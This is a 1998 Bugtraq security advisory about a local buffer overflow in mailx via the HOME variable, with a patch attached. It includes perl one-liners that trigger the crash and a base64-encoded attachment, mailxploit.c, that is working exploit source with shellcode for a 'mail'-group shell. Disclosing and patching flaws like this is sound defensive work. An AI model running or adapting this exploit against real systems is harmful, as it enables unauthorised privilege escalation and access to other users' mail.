security hole in mailx
Date: Thu, 25 Jun 1998 06:19:29 +0200
From: Alvaro Martinez Echevarria <alvaro@LANDER.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: security hole in mailx
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--1287857710-1215613336-898748369=:12634
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Hi there.
I've discovered a rather serious security hole in mailx, the good
old Berkeley mail program. It's somehow present at least in the
last versions I've checked (mailx-8.1.1 in Linux, mailx 5.0 in
Solaris). The bug is an exploitable buffer overflow (using the
HOME environment variable) that allows any local user to acquire
the privileges under which the program runs, usually group "mail"
(on many of the modern versions I've seen, mailx is setgid
"mail"). So the bug allows you to get "mail" group privileges,
and this means that at least you can play with other people's
mail. Although this wouldn't be very nice from you, this
shouldn't be a big problem for the integrity of the system. But
there could be a much more serious implication: being able to
write in /var/spool/mail is usually an open door to the root
account, for example by using races and such in mail delivery
programs.
You can check if your particular version of mailx is vulnerable
through these steps:
$ cp `which mailx` ./mailx
$ HOME=3D`perl -e 'print "A"x10000'` ./mailx
Segmentation fault (core dumped)
$ gdb ./mailx core
GNU gdb 4.17
[...]
#0 0x41414141 in ?? ()
Here we go. By the way, although in Linux 2000 "A"s are enough,
in Solaris you'll need more (10000 worked for me). I've verified
that Debian GNU/Linux (package mailx-8.1.1-9 and previous) is
vulnerable. Solaris 5.5.1 and 5.6 (mailx 5.0) also seem vulnerable
after a couple of quick tests, but I haven't been able to
check the return address due to lack of a root access to any
Solaris, so I'm not 100% sure. Redhat Linux mailx has the bug,
but as they don't install it setgid mail there's no direct
danger.
About the bug: it is in "fio.c", in the "xname" variable of the
"expand" function:
char xname[PATHSIZE];
[...]
sprintf(xname, "%s%s", homedir, name + 1);
Two attachments are included in this message:
-A patch against mailx-8.1.1 that solves the problem. There
are a lot of buffer overflows in the sources of mailx,
although only the one I mention seems to be exploitable. The
patch is dirty and simple: replace sprintf and strcpy by
snprintf and strncpy almost everywhere. I haven't tested it
a lot, use it at your own risk.
-An exploit that should work under Linux (at least it does so in
Debian). To test: compile it, execute it, and it should give you
a shell; check with "id" if you are group "mail". By the way,
the program assumes the gid for group mail is 8, as in Debian.
Please, use it _JUST_ for testing and educative purposes ;)
I reported the problem a few days ago to Debian, Redhat, Sun, and
CERT, and I also sent them the patches. So the new versions
should be on the way or even already released, at least for the
Linux distributions.
BTW, the person who tested the bug under Solaris (I don't have
direct access to any Solaris machine) told me that he had a hard
time:
tcsh$ setenv HOME `perl -e 'print "A"x10000'`
connection lost
!!! Seems like tcsh doesn't like huge homes like this. Second try:
tsch$ exec sh
sh$ HOME=3D`perl -e 'print "A"x10000'`
sh$ which mailx
Segmentation Fault (core dumped)
Erm... Seems like Sun is doing a great job with buffer overflows.
This happened under 5.5.1. I wonder if these have any security
implication. Anyway, they are not bad as a joke.
Regards.
--
Alvaro Mart=EDnez Echevarr=EDa
LANDER SISTEMAS
P=BA Castellana, 121
28046 Madrid, SPAIN
--1287857710-1215613336-898748369=:12634
Content-Type: TEXT/x-csrc; name="mailxploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.980625061929.12634B@leon.lander.es>
Content-Description:
LyoNCiAqIG1haWx4cGxvaXQuYyAoTGludXgvaTM4NikNCiAqIFNhdCBKdW4g
MjAgMDA6NDc6NTkgQ0VTVCAxOTk4DQogKiBBbHZhcm8gTWFydGluZXogRWNo
ZXZhcnJpYSA8ZWxndXJ1QGxhbmRlci5lcz4NCiAqIEV4cGxvaXQgYSBidWZm
ZXIgb3ZlcnJ1biBpbiBtYWlseCB1c2luZyB0aGUgZW52aXJvbm1lbnQgdmFy
aWFibGUNCiAqICRIT01FLCB0byBhY3F1aXJlICJtYWlsIiBncm91cCBwcml2
aWxlZ2VzIChhc3N1bWluZyB0aGF0IG1haWx4DQogKiBpcyBpbnN0YWxsZWQg
c2V0Z2lkIG1haWwpLg0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2lu
Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1
ZGUgPHN0cmluZy5oPg0KDQovKg0KICogVGhlIGxvY2F0aW9uIG9mIG1haWx4
Lg0KICovDQojZGVmaW5lIE1BSUxYICAiL3Vzci9iaW4vbWFpbCINCi8qDQog
KiBUaGUgZ2lkIGZvciBncm91cCBtYWlsIChyZXByZXNlbnRlZCBpbiBhIGNo
YXIsIGluIGhleGFkZWNpbWFsKS4NCiAqLw0KI2RlZmluZSBHSUQgICAgIlx4
MDgiDQoNCiNkZWZpbmUgREVGQVVMVF9PRkZTRVQgICAgICAgICAgICAgICAg
IDIwMDANCiNkZWZpbmUgREVGQVVMVF9CVUZGRVJfU0laRSAgICAgICAgICAg
IDExMjQNCiNkZWZpbmUgTk9QICAgICAgICAgICAgICAgICAgICAgICAgICAg
IDB4OTANCg0KY2hhciBzaGVsbGNvZGVbXSA9DQogIC8qIHNldGV1aWQoR0lE
KTsgc2V0cmV1aWQoR0lELEdJRCk7ICovDQogICJceDMxXHhkYlx4MzFceGM5
XHhiYlx4ZmZceGZmXHhmZlx4ZmZceGIxIiBHSUQgIlx4MzFceGMwXHhiMFx4
NDdceGNkXHg4MCINCiAgIlx4MzFceGRiXHgzMVx4YzlceGIzIiBHSUQgIlx4
YjEiIEdJRCAiXHgzMVx4YzBceGIwXHg0N1x4Y2RceDgwIg0KICAvKiBnZW5l
cmljIHNoZWxsIGNvZGUgYnkgQWxlcGggT25lICovDQogICJceGViXHgxZlx4
NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ2XHgw
Y1x4YjBceDBiIg0KICAiXHg4OVx4ZjNceDhkXHg0ZVx4MDhceDhkXHg1Nlx4
MGNceGNkXHg4MFx4MzFceGRiXHg4OVx4ZDhceDQwXHhjZCINCiAgIlx4ODBc
eGU4XHhkY1x4ZmZceGZmXHhmZi9iaW4vc2giOw0KDQp1bnNpZ25lZCBsb25n
DQpnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAlZXNwLCVlYXgi
KTsNCn0NCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsN
CiAgY2hhciAqYnVmZiwgKnB0cjsNCiAgbG9uZyAqYWRkcl9wdHIsIGFkZHI7
DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQsIGJzaXplPURFRkFVTFRf
QlVGRkVSX1NJWkU7DQogIGludCBpOw0KDQogIGFkZHIgPSBnZXRfc3AoKSAt
IG9mZnNldDsNCiAgaWYgKChidWZmPShjaGFyICopbWFsbG9jKGJzaXplKSk9
PU5VTEwpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiZXJyb3IgaW4gbWFsbG9j
KClcbiIpOw0KICAgIGV4aXQoMSk7DQogIH0NCg0KICBwdHIgPSBidWZmOw0K
ICBhZGRyX3B0ciA9IChsb25nICopIHB0cjsNCiAgZm9yIChpID0gMDsgaSA8
IGJzaXplOyBpKz00KQ0KICAgICooYWRkcl9wdHIrKykgPSBhZGRyOw0KICBm
b3IgKGkgPSAwOyBpIDwgYnNpemUvMjsgaSsrKQ0KICAgIGJ1ZmZbaV0gPSBO
T1A7DQogIHB0ciA9IGJ1ZmYgKyAoKGJzaXplLzIpIC0gKHN0cmxlbihzaGVs
bGNvZGUpLzIpKTsNCiAgZm9yIChpID0gMDsgaSA8IHN0cmxlbihzaGVsbGNv
ZGUpOyBpKyspDQogICAgKihwdHIrKykgPSBzaGVsbGNvZGVbaV07DQogIGJ1
ZmZbYnNpemUgLSAxXSA9ICdcMCc7DQoNCiAgc2V0ZW52KCJIT01FIixidWZm
LDEpOw0KICBleGVjbChNQUlMWCxNQUlMWCwiLW4iLCItZiIsIn4vcGF0YXRh
IixOVUxMKTsNCg0KICBleGl0KDApOw0KDQp9DQoNCg==
--1287857710-1215613336-898748369=:12634
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-mailx-8.1.1"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.980625061929.12634C@leon.lander.es>
Content-Description:
ZGlmZiAtcnUgbWFpbHgtOC4xLjEub3JpZy9hdXguYyBtYWlseC04LjEuMS9h
dXguYw0KLS0tIG1haWx4LTguMS4xLm9yaWcvYXV4LmMJRnJpIEp1biAxNCAx
MDoyNjo1NSAxOTk2DQorKysgbWFpbHgtOC4xLjEvYXV4LmMJU2F0IEp1biAy
MCAwNDo0ODozNiAxOTk4DQpAQCAtMjgwLDE2ICsyODAsMjEgQEANCiAgKiBD
b3B5IGEgc3RyaW5nLCBsb3dlcmNhc2luZyBpdCBhcyB3ZSBnby4NCiAgKi8N
CiB2b2lkDQotaXN0cmNweShkZXN0LCBzcmMpDQoraXN0cmNweShkZXN0LCBz
cmMsIHNpemUpDQogCXJlZ2lzdGVyIGNoYXIgKmRlc3QsICpzcmM7DQorCWlu
dCBzaXplOw0KIHsNCisJcmVnaXN0ZXIgY2hhciAqbWF4Ow0KIA0KLQlkbyB7
DQotCQlpZiAoaXN1cHBlcigqc3JjKSkNCisJbWF4PWRlc3Qrc2l6ZS0xOw0K
Kwl3aGlsZSAoZGVzdDw9bWF4ICYmICpzcmMhPSdcMCcpIHsNCisJCWlmIChp
c3VwcGVyKCpzcmMpKSB7DQogCQkJKmRlc3QrKyA9IHRvbG93ZXIoKnNyYyk7
DQotCQllbHNlDQorCQl9IGVsc2Ugew0KIAkJCSpkZXN0KysgPSAqc3JjOw0K
LQl9IHdoaWxlICgqc3JjKysgIT0gMCk7DQorCQl9DQorCQlzcmMrKzsNCisJ
fQ0KIH0NCiANCiAvKg0KQEAgLTYwNiwxMCArNjExLDEzIEBADQogCQkJCWJy
ZWFrOw0KIAkJCWNwKys7DQogCQkJaWYgKGZpcnN0KSB7DQotCQkJCXN0cmNw
eShuYW1lYnVmLCBjcCk7DQorCQkJCXN0cm5jcHkobmFtZWJ1ZiwgY3AsIExJ
TkVTSVpFKTsNCiAJCQkJZmlyc3QgPSAwOw0KLQkJCX0gZWxzZQ0KLQkJCQlz
dHJjcHkocmluZGV4KG5hbWVidWYsICchJykrMSwgY3ApOw0KKwkJCX0gZWxz
ZSB7DQorCQkJCWNwMj1yaW5kZXgobmFtZWJ1ZiwgJyEnKSsxOw0KKwkJCQlz
dHJuY3B5KGNwMiwgY3AsIChuYW1lYnVmK0xJTkVTSVpFKS1jcDIpOw0KKwkJ
CX0NCisJCQluYW1lYnVmW0xJTkVTSVpFLTJdPSdcMCc7DQogCQkJc3RyY2F0
KG5hbWVidWYsICIhIik7DQogCQkJZ290byBuZXduYW1lOw0KIAkJfQ0KQEAg
LTY5MSw3ICs2OTksOCBAQA0KIAkgKiBMb3dlci1jYXNlIHRoZSBzdHJpbmcs
IHNvIHRoYXQgIlN0YXR1cyIgYW5kICJzdGF0dXMiDQogCSAqIHdpbGwgaGFz
aCB0byB0aGUgc2FtZSBwbGFjZS4NCiAJICovDQotCWlzdHJjcHkocmVhbGZs
ZCwgZmllbGQpOw0KKwlpc3RyY3B5KHJlYWxmbGQsIGZpZWxkLCBCVUZTSVop
Ow0KKwlyZWFsZmxkW0JVRlNJWi0xXT0nXDAnOw0KIAlpZiAoaWdub3JlWzFd
LmlfY291bnQgPiAwKQ0KIAkJcmV0dXJuICghbWVtYmVyKHJlYWxmbGQsIGln
bm9yZSArIDEpKTsNCiAJZWxzZQ0KZGlmZiAtcnUgbWFpbHgtOC4xLjEub3Jp
Zy9jbWQxLmMgbWFpbHgtOC4xLjEvY21kMS5jDQotLS0gbWFpbHgtOC4xLjEu
b3JpZy9jbWQxLmMJRnJpIEp1biAxNCAxMDoyNjo1NiAxOTk2DQorKysgbWFp
bHgtOC4xLjEvY21kMS5jCVNhdCBKdW4gMjAgMDQ6MDc6MzkgMTk5OA0KQEAg
LTQ2NSw3ICs0NjUsNyBAQA0KIAljaGFyIGRpcm5hbWVbQlVGU0laXTsNCiAJ
Y2hhciAqY21kOw0KIA0KLQlpZiAoZ2V0Zm9sZChkaXJuYW1lKSA8IDApIHsN
CisJaWYgKGdldGZvbGQoZGlybmFtZSwgQlVGU0laKSA8IDApIHsNCiAJCXBy
aW50ZigiTm8gdmFsdWUgc2V0IGZvciBcImZvbGRlclwiXG4iKTsNCiAJCXJl
dHVybiAxOw0KIAl9DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL2NtZDIu
YyBtYWlseC04LjEuMS9jbWQyLmMNCi0tLSBtYWlseC04LjEuMS5vcmlnL2Nt
ZDIuYwlGcmkgSnVuIDE0IDEwOjI2OjU2IDE5OTYNCisrKyBtYWlseC04LjEu
MS9jbWQyLmMJU2F0IEp1biAyMCAwNDo0OTo1NCAxOTk4DQpAQCAtNDk2LDcg
KzQ5Niw4IEBADQogCWlmICgqbGlzdCA9PSBOT1NUUikNCiAJCXJldHVybiBp
Z3Nob3codGFiLCB3aGljaCk7DQogCWZvciAoYXAgPSBsaXN0OyAqYXAgIT0g
MDsgYXArKykgew0KLQkJaXN0cmNweShmaWVsZCwgKmFwKTsNCisJCWlzdHJj
cHkoZmllbGQsICphcCwgQlVGU0laKTsNCisJCWZpZWxkW0JVRlNJWi0xXT0n
XDAnOw0KIAkJaWYgKG1lbWJlcihmaWVsZCwgdGFiKSkNCiAJCQljb250aW51
ZTsNCiAJCWggPSBoYXNoKGZpZWxkKTsNCmRpZmYgLXJ1IG1haWx4LTguMS4x
Lm9yaWcvY21kMy5jIG1haWx4LTguMS4xL2NtZDMuYw0KLS0tIG1haWx4LTgu
MS4xLm9yaWcvY21kMy5jCUZyaSBKdW4gMTQgMTA6MjY6NTcgMTk5Ng0KKysr
IG1haWx4LTguMS4xL2NtZDMuYwlTYXQgSnVuIDIwIDA0OjQxOjM3IDE5OTgN
CkBAIC02NSw4ICs2NSw5IEBADQogCWNoYXIgKnNoZWxsOw0KIAljaGFyIGNt
ZFtCVUZTSVpdOw0KIA0KLQkodm9pZCkgc3RyY3B5KGNtZCwgc3RyKTsNCi0J
aWYgKGJhbmdleHAoY21kKSA8IDApDQorCSh2b2lkKSBzdHJuY3B5KGNtZCwg
c3RyLCBCVUZTSVopOw0KKwljbWRbQlVGU0laLTFdPSdcMCc7DQorCWlmIChi
YW5nZXhwKGNtZCwgQlVGU0laKSA8IDApDQogCQlyZXR1cm4gMTsNCiAJaWYg
KChzaGVsbCA9IHZhbHVlKCJTSEVMTCIpKSA9PSBOT1NUUikNCiAJCXNoZWxs
ID0gX1BBVEhfQ1NIRUxMOw0KQEAgLTEwMyw4ICsxMDQsOSBAQA0KIGNoYXIJ
bGFzdGJhbmdbMTI4XTsNCiANCiBpbnQNCi1iYW5nZXhwKHN0cikNCitiYW5n
ZXhwKHN0ciwgc2l6ZSkNCiAJY2hhciAqc3RyOw0KKwlpbnQgc2l6ZTsNCiB7
DQogCWNoYXIgYmFuZ2J1ZltCVUZTSVpdOw0KIAlyZWdpc3RlciBjaGFyICpj
cCwgKmNwMjsNCkBAIC0xNDQsNyArMTQ2LDggQEANCiAJCXByaW50ZigiISVz
XG4iLCBiYW5nYnVmKTsNCiAJCWZmbHVzaChzdGRvdXQpOw0KIAl9DQotCXN0
cmNweShzdHIsIGJhbmdidWYpOw0KKwlzdHJuY3B5KHN0ciwgYmFuZ2J1Ziwg
c2l6ZSk7DQorCXN0cltzaXplLTFdPSdcMCc7DQogCXN0cm5jcHkobGFzdGJh
bmcsIGJhbmdidWYsIDEyOCk7DQogCWxhc3RiYW5nWzEyN10gPSAwOw0KIAly
ZXR1cm4oMCk7DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL2NvbGxlY3Qu
YyBtYWlseC04LjEuMS9jb2xsZWN0LmMNCi0tLSBtYWlseC04LjEuMS5vcmln
L2NvbGxlY3QuYwlGcmkgSnVuIDE0IDEwOjI2OjU4IDE5OTYNCisrKyBtYWls
eC04LjEuMS9jb2xsZWN0LmMJU2F0IEp1biAyMCAwNDo1Mjo0MCAxOTk4DQpA
QCAtMjY4LDcgKzI2OCw4IEBADQogCQkJaHAtPmhfYmNjID0gY2F0KGhwLT5o
X2JjYywgZXh0cmFjdCgmbGluZWJ1ZlsyXSwgR0JDQykpOw0KIAkJCWJyZWFr
Ow0KIAkJY2FzZSAnZCc6DQotCQkJc3RyY3B5KGxpbmVidWYgKyAyLCBnZXRk
ZWFkbGV0dGVyKCkpOw0KKwkJCXN0cm5jcHkobGluZWJ1ZiArIDIsIGdldGRl
YWRsZXR0ZXIoKSwgTElORVNJWkUgLSAyKTsNCisJCQlsaW5lYnVmW0xJTkVT
SVpFLTFdPSdcMCc7DQogCQkJLyogZmFsbCBpbnRvIC4gLiAuICovDQogCQlj
YXNlICdyJzoNCiAJCWNhc2UgJzwnOg0KT25seSBpbiBtYWlseC04LjEuMTog
Y29sbGVjdC5jLm9yaWcNCmRpZmYgLXJ1IG1haWx4LTguMS4xLm9yaWcvZXh0
ZXJuLmggbWFpbHgtOC4xLjEvZXh0ZXJuLmgNCi0tLSBtYWlseC04LjEuMS5v
cmlnL2V4dGVybi5oCUZyaSBKdW4gMTQgMTA6MjY6NTkgMTk5Ng0KKysrIG1h
aWx4LTguMS4xL2V4dGVybi5oCVNhdCBKdW4gMjAgMDQ6NTI6NDAgMTk5OA0K
QEAgLTk0LDcgKzk0LDcgQEANCiBpbnQJIGFwcGVuZCBfX1AoKHN0cnVjdCBt
ZXNzYWdlICosIEZJTEUgKikpOw0KIGludAkgYXJnY291bnQgX19QKChjaGFy
ICoqKSk7DQogdm9pZAkgYXNzaWduIF9fUCgoY2hhciBbXSwgY2hhciBbXSkp
Ow0KLWludAkgYmFuZ2V4cCBfX1AoKGNoYXIgKikpOw0KK2ludAkgYmFuZ2V4
cCBfX1AoKGNoYXIgKiwgaW50KSk7DQogaW50CSBibGFua2xpbmUgX19QKChj
aGFyIFtdKSk7DQogdm9pZAkgYnJva3BpcGUgX19QKChpbnQpKTsNCiBpbnQJ
IGNoYXJjb3VudCBfX1AoKGNoYXIgKiwgaW50KSk7DQpAQCAtMTMwLDcgKzEz
MCw3IEBADQogaW50CSBmaWxlIF9fUCgodm9pZCAqKSk7DQogc3RydWN0IGdy
b3VwaGVhZCAqDQogCSBmaW5kZ3JvdXAgX19QKChjaGFyIFtdKSk7DQotdm9p
ZAkgZmluZG1haWwgX19QKChjaGFyICosIGNoYXIgKikpOw0KK3ZvaWQJIGZp
bmRtYWlsIF9fUCgoY2hhciAqLCBjaGFyICosIGludCkpOw0KIGludAkgZmly
c3QgX19QKChpbnQsIGludCkpOw0KIHZvaWQJIGZpeGhlYWQgX19QKChzdHJ1
Y3QgaGVhZGVyICosIHN0cnVjdCBuYW1lICopKTsNCiB2b2lkCSBmbXQgX19Q
KChjaGFyICosIHN0cnVjdCBuYW1lICosIEZJTEUgKiwgaW50KSk7DQpAQCAt
MTM5LDcgKzEzOSw3IEBADQogdm9pZAkgZnJlZV9jaGlsZCBfX1AoKGludCkp
Ow0KIGludAkgZnJvbSBfX1AoKHZvaWQgKikpOw0KIG9mZl90CSBmc2l6ZSBf
X1AoKEZJTEUgKikpOw0KLWludAkgZ2V0Zm9sZCBfX1AoKGNoYXIgKikpOw0K
K2ludAkgZ2V0Zm9sZCBfX1AoKGNoYXIgKiwgaW50KSk7DQogaW50CSBnZXRo
ZmllbGQgX19QKChGSUxFICosIGNoYXIgW10sIGludCwgY2hhciAqKikpOw0K
IGludAkgZ2V0bXNnbGlzdCBfX1AoKGNoYXIgKiwgaW50ICosIGludCkpOw0K
IGludAkgZ2V0cmF3bGlzdCBfX1AoKGNoYXIgW10sIGNoYXIgKiosIGludCkp
Ow0KQEAgLTE2NCw3ICsxNjQsNyBAQA0KIGludAkgaXNoZWFkIF9fUCgoY2hh
ciBbXSkpOw0KIGludAkgaXNpZ24gX19QKChjaGFyICosIHN0cnVjdCBpZ25v
cmV0YWIgW10pKTsNCiBpbnQJIGlzcHJlZml4IF9fUCgoY2hhciAqLCBjaGFy
ICopKTsNCi12b2lkCSBpc3RyY3B5IF9fUCgoY2hhciAqLCBjaGFyICopKTsN
Cit2b2lkCSBpc3RyY3B5IF9fUCgoY2hhciAqLCBjaGFyICosIGludCkpOw0K
IGNvbnN0IHN0cnVjdCBjbWQgKg0KIAkgbGV4IF9fUCgoY2hhciBbXSkpOw0K
IHZvaWQJIGxvYWQgX19QKChjaGFyICopKTsNCmRpZmYgLXJ1IG1haWx4LTgu
MS4xLm9yaWcvZmlvLmMgbWFpbHgtOC4xLjEvZmlvLmMNCi0tLSBtYWlseC04
LjEuMS5vcmlnL2Zpby5jCUZyaSBKdW4gMTQgMTA6Mjc6MDAgMTk5Ng0KKysr
IG1haWx4LTguMS4xL2Zpby5jCVNhdCBKdW4gMjAgMDQ6NTI6NDAgMTk5OA0K
QEAgLTc0LDcgKzc0LDcgQEANCiAJY2hhciBsaW5lYnVmW0xJTkVTSVpFXTsN
CiANCiAJLyogR2V0IHRlbXBvcmFyeSBmaWxlLiAqLw0KLQkodm9pZClzcHJp
bnRmKGxpbmVidWYsICIlcy9tYWlsLlhYWFhYWCIsIHRtcGRpcik7DQorCSh2
b2lkKXNucHJpbnRmKGxpbmVidWYsTElORVNJWkUsIiVzL21haWwuWFhYWFhY
IiwgdG1wZGlyKTsNCiAJaWYgKChjID0gbWtzdGVtcChsaW5lYnVmKSkgPT0g
LTEgfHwNCiAJICAgIChtZXN0bXAgPSBGZG9wZW4oYywgInIrIikpID09IE5V
TEwpIHsNCiAJCSh2b2lkKWZwcmludGYoc3RkZXJyLCAibWFpbDogY2FuJ3Qg
b3BlbiAlc1xuIiwgbGluZWJ1Zik7DQpAQCAtMzM2LDcgKzMzNiw3IEBADQog
CSAqLw0KIAlzd2l0Y2ggKCpuYW1lKSB7DQogCWNhc2UgJyUnOg0KLQkJZmlu
ZG1haWwobmFtZVsxXSA/IG5hbWUgKyAxIDogbXluYW1lLCB4bmFtZSk7DQor
CQlmaW5kbWFpbChuYW1lWzFdID8gbmFtZSArIDEgOiBteW5hbWUsIHhuYW1l
LCBQQVRIU0laRSk7DQogCQlyZXR1cm4gc2F2ZXN0cih4bmFtZSk7DQogCWNh
c2UgJyMnOg0KIAkJaWYgKG5hbWVbMV0gIT0gMCkNCkBAIC0zNTEsMTMgKzM1
MSwxMyBAQA0KIAkJCW5hbWUgPSAifi9tYm94IjsNCiAJCS8qIGZhbGwgdGhy
b3VnaCAqLw0KIAl9DQotCWlmIChuYW1lWzBdID09ICcrJyAmJiBnZXRmb2xk
KGNtZGJ1ZikgPj0gMCkgew0KLQkJc3ByaW50Zih4bmFtZSwgIiVzLyVzIiwg
Y21kYnVmLCBuYW1lICsgMSk7DQorCWlmIChuYW1lWzBdID09ICcrJyAmJiBn
ZXRmb2xkKGNtZGJ1ZiwgUEFUSFNJWkUpID49IDApIHsNCisJCXNucHJpbnRm
KHhuYW1lLCBQQVRIU0laRSwgIiVzLyVzIiwgY21kYnVmLCBuYW1lICsgMSk7
DQogCQluYW1lID0gc2F2ZXN0cih4bmFtZSk7DQogCX0NCiAJLyogY2F0Y2gg
dGhlIG1vc3QgY29tbW9uIHNoZWxsIG1ldGEgY2hhcmFjdGVyICovDQogCWlm
IChuYW1lWzBdID09ICd+JyAmJiAobmFtZVsxXSA9PSAnLycgfHwgbmFtZVsx
XSA9PSAnXDAnKSkgew0KLQkJc3ByaW50Zih4bmFtZSwgIiVzJXMiLCBob21l
ZGlyLCBuYW1lICsgMSk7DQorCQlzbnByaW50Zih4bmFtZSwgUEFUSFNJWkUs
ICIlcyVzIiwgaG9tZWRpciwgbmFtZSArIDEpOw0KIAkJbmFtZSA9IHNhdmVz
dHIoeG5hbWUpOw0KIAl9DQogCWlmICghYW55b2YobmFtZSwgIn57Wyo/JGAn
XCJcXCIpKQ0KQEAgLTM2Niw3ICszNjYsNyBAQA0KIAkJcGVycm9yKCJwaXBl
Iik7DQogCQlyZXR1cm4gbmFtZTsNCiAJfQ0KLQlzcHJpbnRmKGNtZGJ1Ziwg
ImVjaG8gJXMiLCBuYW1lKTsNCisJc25wcmludGYoY21kYnVmLCBQQVRIU0la
RSwgImVjaG8gJXMiLCBuYW1lKTsNCiAJaWYgKChzaGVsbCA9IHZhbHVlKCJT
SEVMTCIpKSA9PSBOT1NUUikNCiAJCXNoZWxsID0gX1BBVEhfQ1NIRUxMOw0K
IAlwaWQgPSBzdGFydF9jb21tYW5kKHNoZWxsLCAwLCAtMSwgcGl2ZWNbMV0s
ICItYyIsIGNtZGJ1ZiwgTk9TVFIpOw0KQEAgLTQwOSwxNyArNDA5LDIwIEBA
DQogICogRGV0ZXJtaW5lIHRoZSBjdXJyZW50IGZvbGRlciBkaXJlY3Rvcnkg
bmFtZS4NCiAgKi8NCiBpbnQNCi1nZXRmb2xkKG5hbWUpDQorZ2V0Zm9sZChu
YW1lLCBzaXplKQ0KIAljaGFyICpuYW1lOw0KKwlpbnQgc2l6ZTsNCiB7DQog
CWNoYXIgKmZvbGRlcjsNCiANCiAJaWYgKChmb2xkZXIgPSB2YWx1ZSgiZm9s
ZGVyIikpID09IE5PU1RSKQ0KIAkJcmV0dXJuICgtMSk7DQotCWlmICgqZm9s
ZGVyID09ICcvJykNCi0JCXN0cmNweShuYW1lLCBmb2xkZXIpOw0KLQllbHNl
DQotCQlzcHJpbnRmKG5hbWUsICIlcy8lcyIsIGhvbWVkaXIsIGZvbGRlcik7
DQorCWlmICgqZm9sZGVyID09ICcvJykgew0KKwkJc3RybmNweShuYW1lLCBm
b2xkZXIsIHNpemUpOw0KKwkJbmFtZVtzaXplXT0nXDAnOw0KKwl9IGVsc2Ug
ew0KKwkJc25wcmludGYobmFtZSwgc2l6ZSwgIiVzLyVzIiwgaG9tZWRpciwg
Zm9sZGVyKTsNCisJfQ0KIAlyZXR1cm4gKDApOw0KIH0NCiANCkBAIC00MzYs
NyArNDM5LDcgQEANCiAJZWxzZSBpZiAoKmNwICE9ICcvJykgew0KIAkJY2hh
ciBidWZbUEFUSFNJWkVdOw0KIA0KLQkJKHZvaWQpIHNwcmludGYoYnVmLCAi
fi8lcyIsIGNwKTsNCisJCSh2b2lkKSBzbnByaW50ZihidWYsIFBBVEhTSVpF
LCAifi8lcyIsIGNwKTsNCiAJCWNwID0gZXhwYW5kKGJ1Zik7DQogCX0NCiAJ
cmV0dXJuIGNwOw0KZGlmZiAtcnUgbWFpbHgtOC4xLjEub3JpZy9sZXguYyBt
YWlseC04LjEuMS9sZXguYw0KLS0tIG1haWx4LTguMS4xLm9yaWcvbGV4LmMJ
RnJpIEp1biAxNCAxMDoyNzowMyAxOTk2DQorKysgbWFpbHgtOC4xLjEvbGV4
LmMJU2F0IEp1biAyMCAwNDo1Mjo0MCAxOTk4DQpAQCAtMTM0LDkgKzEzNCwx
MiBAQA0KIAl9DQogCXNodWRjbG9iID0gMTsNCiAJZWRpdCA9IGlzZWRpdDsN
Ci0Jc3RyY3B5KHByZXZmaWxlLCBtYWlsbmFtZSk7DQotCWlmIChuYW1lICE9
IG1haWxuYW1lKQ0KLQkJc3RyY3B5KG1haWxuYW1lLCBuYW1lKTsNCisJc3Ry
bmNweShwcmV2ZmlsZSwgbWFpbG5hbWUsIFBBVEhTSVpFKTsNCisJcHJldmZp
bGVbUEFUSFNJWkUtMV09J1wwJzsNCisJaWYgKG5hbWUgIT0gbWFpbG5hbWUp
IHsNCisJCXN0cm5jcHkobWFpbG5hbWUsIG5hbWUsIFBBVEhTSVpFKTsNCisJ
CW1haWxuYW1lW1BBVEhTSVpFLTFdPSdcMCc7DQorCX0NCiAJbWFpbHNpemUg
PSBmc2l6ZShpYnVmKTsNCiAJaWYgKChvdGYgPSBmb3Blbih0ZW1wTWVzZywg
InciKSkgPT0gTlVMTCkgew0KIAkJcGVycm9yKHRlbXBNZXNnKTsNCkBAIC02
MTYsMTAgKzYxOSwxMCBAQA0KIAkJCXMrKzsNCiAJfQ0KIAllbmFtZSA9IG1h
aWxuYW1lOw0KLQlpZiAoZ2V0Zm9sZChmbmFtZSkgPj0gMCkgew0KKwlpZiAo
Z2V0Zm9sZChmbmFtZSwgQlVGU0laLTEpID49IDApIHsNCiAJCXN0cmNhdChm
bmFtZSwgIi8iKTsNCiAJCWlmIChzdHJuY21wKGZuYW1lLCBtYWlsbmFtZSwg
c3RybGVuKGZuYW1lKSkgPT0gMCkgew0KLQkJCXNwcmludGYoem5hbWUsICIr
JXMiLCBtYWlsbmFtZSArIHN0cmxlbihmbmFtZSkpOw0KKwkJCXNucHJpbnRm
KHpuYW1lLCBCVUZTSVosICIrJXMiLCBtYWlsbmFtZSArIHN0cmxlbihmbmFt
ZSkpOw0KIAkJCWVuYW1lID0gem5hbWU7DQogCQl9DQogCX0NCk9ubHkgaW4g
bWFpbHgtOC4xLjE6IGxleC5jLm9yaWcNCmRpZmYgLXJ1IG1haWx4LTguMS4x
Lm9yaWcvbGlzdC5jIG1haWx4LTguMS4xL2xpc3QuYw0KLS0tIG1haWx4LTgu
MS4xLm9yaWcvbGlzdC5jCUZyaSBKdW4gMTQgMTA6Mjc6MDMgMTk5Ng0KKysr
IG1haWx4LTguMS4xL2xpc3QuYwlTYXQgSnVuIDIwIDA0OjM0OjQwIDE5OTgN
CkBAIC01MTUsNyArNTE1LDggQEANCiAJaW50IHF1b3RlYzsNCiANCiAJaWYg
KHJlZ3JldHAgPj0gMCkgew0KLQkJc3RyY3B5KGxleHN0cmluZywgc3RyaW5n
